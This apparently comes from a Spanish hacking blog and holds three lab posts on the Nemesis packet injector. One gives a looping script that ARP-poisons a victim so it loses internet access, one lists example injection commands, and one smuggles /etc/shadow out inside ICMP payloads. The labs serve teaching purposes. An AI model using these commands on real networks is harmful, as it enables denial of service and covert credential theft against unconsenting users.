Banner 1

Mostrando entradas con la etiqueta nemesis. Mostrar todas las entradas
Mostrando entradas con la etiqueta nemesis. Mostrar todas las entradas

conociendo a NEMESIS 2/3 creacion de paquetes arp[propues y desarrollado]

1 comentarios
* Titulo del Laboratorio

Creacion y modificacion de paquetes(peticiones) arp por medio de nemesis

* Objetivos

Conocer el funcionamiento del protocolo tcp/ip y sus debilidades
Conocer el funcionamiento de una peticion arp y explotarlo

* Elementos de hardware necesarios

2 PC
Cableado mas router o modem , en el peor de los casos un hub xD

* Elementos de Software necesarios

Linux o windows
Nemesis
Shell

* Otros elementos necesarios

Conocimientos basicos sobre paquetes arp
Conocimiento sobre analisis de la tablar arp de nuestro pc
Ganas de aprender y de no causar daño


Resumen

Bueno despues de tanta ausencia y espera por la segunda parte de este laboratorio hoy lo desarrollaremos con un poco mas de gracia que el anterior , programaremos para que sea mas productivo y valida la espera.
En resumen lo que vamos a ver hoy es como podemos modificar una peticion arp y asi engañando al router para que no vea un pc victima dentro de nuestra red.
Este ataque es muy basico pero muchos no lo concen , ya hemos hablado de las vulnerabilidades que tienen las capas inferiores del modelo osi y que digamos son trasparentes para un ataque, hoy vamos a ver como podemos dejar sin internet a un pc de nuestra red manipulando paquetes arp.
La idea de todo esto no es generar ataques en red ni muchos menos dejar sin internet al que nos cae mal que esta al lado nuestro, la idea es buscar una solucion a estos problemas.

Desarrollo:

Primero que todo ya debemos tener nuestro nemesis instalado tras haber desarrollado nuestro anterior laboratorio.

Descripcion del entorno:

Bueno el laboratorio se desarrollo de la siguiente forma:

IP Equipo atacante 10.0.18.110
IP Equipo victima 10.0.18.150
IP Router 10.0.18.1

Paso 1: comprobar conectividad

Free Image Hosting at www.ImageShack.us


Explicacion:

Comprobamos conectividad con el equipo a atacar:
ping 10.0.18.150

Comprobamos conectividad con el router:
ping 10.0.18.1
aunque si vemos la otra maquina es porque tenemos conectividad xD

Y luego les muestro la configuracion de mi maquina para que vean que esa es realmente mi ip y queno hay trucos.

Paso 2: desarrollo del ataque

Primero que todo vamos a necesitar nuestra consola para programar un shell script.

despues de abierta la shell , ejecutamos el editor vi.

vi script-nemesis

y ahora a programar

i=0
while [ $i -le 100 ]
do
nemesis arp -D 10.0.18.150 -S 10.0.18.1 -H AA:BB:CC:DD:EE:FF
done

listo esto es todo , le damos escape y dos puntos wq para guardar.

Explicacion:

primero vemos un ciclo , eso no hay necesidad de explicar , lo fundamental es entender que esta haciando nemesis, bueno le estamos diciendo a nemesis que mientras dura este ciclo mande una peticion a la ip 10.0.18.150 ose a la direccion de destino(-D) que sera la ip a atacar , donde el origen sea 10.0.18.1 osea la ip del router(-S) con una direccion mac falsa(-H).
Que estamos haciendo , que nuestro router piense que la direccion ip a atacar tiene esa direccion mac , asi logrando un envenenamiento en la tabla arp del pc victima quedando sin internet.

NOTA:
para las personas poco conocedoras del software libre les explicare como ejecutar el script.

Luego de guardar el escript ejecutamos

chmod 777 script-nemesis

con esto tendra todos los permisos en nuestro caso solo importa ejecucion pero de todas maneras asi es valido para no tener problemas despues

luego digitamos en la shell

./script-nemesis

y empezara nuestro ataque

El porque del script?

sencillo la tabla arp actualiza determinado tiempo , si lo ejecutamos solo una vez no tendria mayor efecto , pero si lo ejecutamos seguidamente se notara el ataque.


Paso 3: comprobando el ataque

Bueno antes de ver la imagen les explicare algo.

Se comprobo conectividad con la ip atacante y con el router, ANTES DEL ATAQUE, luego se compro conecctividad despues del ataque y vemos que ya no hay conectividad osea quedo por fuera de la red y ademas les muestro la configuracion del equipo

Free Image Hosting at www.ImageShack.us



Listo hasta aqui nuestro ataque funcionando maravillosamente, ya podemos dejar sin internet a nuestro jefe xD(BROMA).

Conclusiones:

Una conclusion muy ovbia es la vulnerabilidad tan grande que tiene el modelo osi y sobre todo que si estuvieramos como victimas no podriamos hacer nada contra este ataque , PARA QUE UN ANTIVIRUS?.
Claro que se podrian bloquear ips y cosas por el estilo pero el problema seguiria ahi , por eso me gustaria que plantearan sus soluciones sin mirar las existentes por su puesto.

Espero les haya gustado este segundo laboratorio , el tercero no lo hare tan extenso por que lo profundizare con otra herramienta hecha solo para ese ataque.

saludos roboticos

Links Relacionados:

http://bad-robot.blogspot.com/2009/04/conociendo-nemesis-13-creacion-de.html

Links en las las comunidades donde participo

http://foro.latinohack.com/showthread.php?p=37149#post37149
http://foro.colombiaunderground.org/index.php/topic,5067.0.html

Si lo ven en alguno otro sitio por favor avisar.

Introduccion al nemesis

1 comentarios
Hace poco postee un laboratorio de conociendo a nemesis , a mi me gusta ir a la practica antes que la teoria pero me parece que si es debido saber almenos que es nemesis , asi que por eso les dejo esta teoria que encontre muy importante en otro blog muy bueno por cierto , saludos a el

Nemesis.

Es un inyector de paquetes, su funcionamiento consiste en enviar tramas de datos a una red utilizando el protocolo tcp/ip. Se utiliza para probar y depurar servicios de red específicos. Es ideal para auditar servicios de red pero también puede ser utilizada para realizar ataques a una red, como una inundación UDP.

Ejemplos de uso de Nemesis:

nemesis tcp -v -S 192.168.1.1 -D 192.168.2.2 -fSA -y 22 -P foo

Enviar paquete tcp desde (-s) 192.168.1.1 hasta 8-D) 192.168.2.2 en el puerto destino 22 (-y) con confirmación de paquete enviado

nemesis udp -v -S 10.11.12.13 -D 10.1.1.2 -x 11111 -y 53 -P bindpkt

Enviar paquete udp desde (-S) 10.11.12.13 y puerto (-x) 11111 al puerto (-y) 53 con confirmación de paquete enviado

nemesis icmp redirect -S 10.10.10.3 -D 10.10.10.1 -G 10.10.10.3 -qR

Enviar paquete icmp desde (-S) 10.10.10.1 por la puerta de enlace (-G) 10.10.10.3. El redirect se indica en -qR.

nemesis arp -v -d ne0 -H 0:1:2:3:4:5 -S 10.11.30.5 -D 10.10.15.1

Enviar paquete arp a la primera tarjeta ethernet (-d) y mac (-H) 0:1:2:3:4:5 e IP (-S) 10.11.30.5 al destino cuya IP es (-S) 10.10.15.1.Esta opción podría ser utilizada para realizar un envenenamiento de la cache ARP, porque si a un sistema con IP 10.10.15.1 le llega un paquete ARP de que a la mac 0:1:2:3:4:5 le corresponde la IP 10.11.30.5, el sistema cuya IP real es 10.11.30.5 quedaría desconectado de la red y todos los paquetes destinados a él irían al sistema cuya mac es 0:1:2:3:4:5.

Más información y descarga de Nemesis.
http://www.packetfactory.net/projects/nemesis/

Fuente:http://vtroger.blogspot.com/2008/12/herramientas-para-un-administrador-de.html

conociendo a NEMESIS 1/3 [creacion de paquetes icmp]hackiando con bad_robot

2 comentarios
* Titulo del Laboratorio

Creacion de paquetes icmp por medio de nemesis

* Objetivos

Conocer el funcionamiento del protocolo tcp/ip y sus debilidades
Conocer  el funcionamiento de un paquete icmp y explotarlo

* Elementos de hardware necesarios

2 PC
Cableado mas router o modem , en el peor de los casos un hub xD

* Elementos de Software necesarios

Linux o windows
Nemesis
Sniffer

* Otros elementos necesarios

Conocimientos basicos sobre paquetes icmp
Conocimiento sobre analisis de paquetes en red
Ganas de aprender y de no causar dan'o


Resumen

La idea es empezar a conocer la herramienta nemesis, por esto dividire el tema en tres post diferentes , utilizando el nemesis en varios sentidos (protocolos diferentes) , por obvia razones no alcanzariamos a estudiarlo a fondo totalmente ya que nemesis es muy extenso por eso queda en ustedes la profundizacion de la herramienta(muy recomendado).

Bueno ahora si hablemos del post de hoy , la idea es crear un paquete icmp o como todos lo conocemos "ping"; pero esto no tendria ninguna utilidad con solo crearlo es por eso que hoy veremos como aprovechar esa creacion de este tipo de paquetes.

Hoy vamos a usar la vulnerabilidad del mismo paquete para enviar informacion por la red, dividire el tema en 2: estenografia en red y hacking en red.

!. Estenografia en red:

Basicamente lo que tratamos es "ocultar" datos en la red, en su totalidad nunca van a estar ocultos ya esto depende es de la audacia del administrador.
Es muy comun que un administrador de red este revisando todo tipo de paquete , pero casi nunca revisan un paquete icmp porque? porque contiene "informacion no valiosa" pues hoy vamos a cambiar esa idea.

A.Lo primero que vamos hacer es mirar la sintaxis de nemesis



Podemos observar todos los modos que soporta nemesis, hoy vamos a usar el icmp

B. Ahora vamos a crear un texto para enviar por la red, esto lo hacemos lo mas facil posible por medio de echo

Código:
echo hacked by bad_robot > hacked.txt



C.Ejecutamos el sniffer en mi caso wireshark y le damos click en interfaces



D. En mi caso voy a realizar la prueba localmente , por eso utilizare la interfaz lo




E.Ahora creamos nuestro paquete icmp el cual vamos a mandar a la direccion local osea lo, utilizaremos el campo vulnerable de este protocolo osea payload , aqui enviaremos el documento que creamos al principio, la sintaxis es la siguiente:

Código:
nemesis icmp -P haked.txt -D 127.0.0.1



Explicacion:

nemesis icmp: es el modo
   
-P haked.txt : con -P especificamos que vamos a usar ese campo del paquete y lo creamos a nuestro antojo , en nuestro caso queremos que lo rellene con la informacion dentro del documento

-D 127.0.0.1 : con -D especificamos la direccion ip destino y utilizamoos la direccion lo.

NOTA: No hemos especificado la direccion ip origen, esto no es recomendado en un "ataque" a nivel de red local ya que el router puede que no resuelva el paquete porque la ip no proviene de su red.

F. Injecctamos el paquete y nos debe aparecer paquete injecctado



Podemos observar como nuestro sniffer detecta el trafico del paquete y lo captura

G.Miramos los datos capturados por el sniffer y observamos que nuestro mensage fue enviado exitosamente.



Bueno hasta aqui hemos aprendido a enviar mensages a nivel de red, ya sea estenograficos o algo geek , depende de el uso que le demos.

2. Hacking en red

Bueno ahora vamos a hacer algo mas malicioso y aprovechemos del todo esta vulnerabilidad, porque no mandar por red algo importante? pues bien hagamoslo.

Supongamos que tenemos acceso a un pc en la red y mejor aun al servidor y queremos mandar datos importantes para luego tener acceso remotamente , como hacemos esto sin que nadie se de cuenta? claro con un "ping", pero se preguntaran que datos pueden ser importantes y descubren "que tal si tenemos los users y pass de los usuarios de la maquina para luego conectarme remotamente", despues de llegar a esta conclusion vamos a poner a practicar nuestro cerebro.
Este metodo sirve tanto para windows como linux , en mi caso use linux ya que la mayoria de servidores estan montados en este s.o (no soy racista de s.o).

Ahora si vamos a la accion , la sintaxis seria la siguiente

Código:
nemesis icmp -P /etc/shadow -D 127.0.0.1



Conclusiones:

Al no especificar direccion ip origen el nemesis genera su propia direccion ip origen(ip spoofing), se puede analisar mirando los dos paquetes injectados, esto tambien es muy usado para un ataque DOS.
   
Las vulnerabilidades de estos protocolos son muy graves porque no existe proteccion alguna o digamos no hay parches para los niveles inferiores de la capa OSI por eso debemos contar con administradores bien preparados para algun tipo de ataque como el hoy visto.

Bueno ya queda de su parte profundizar mas sobre el tema.

saludos roboticos Wink
Powered by Bad Robot
Helped by Blackubay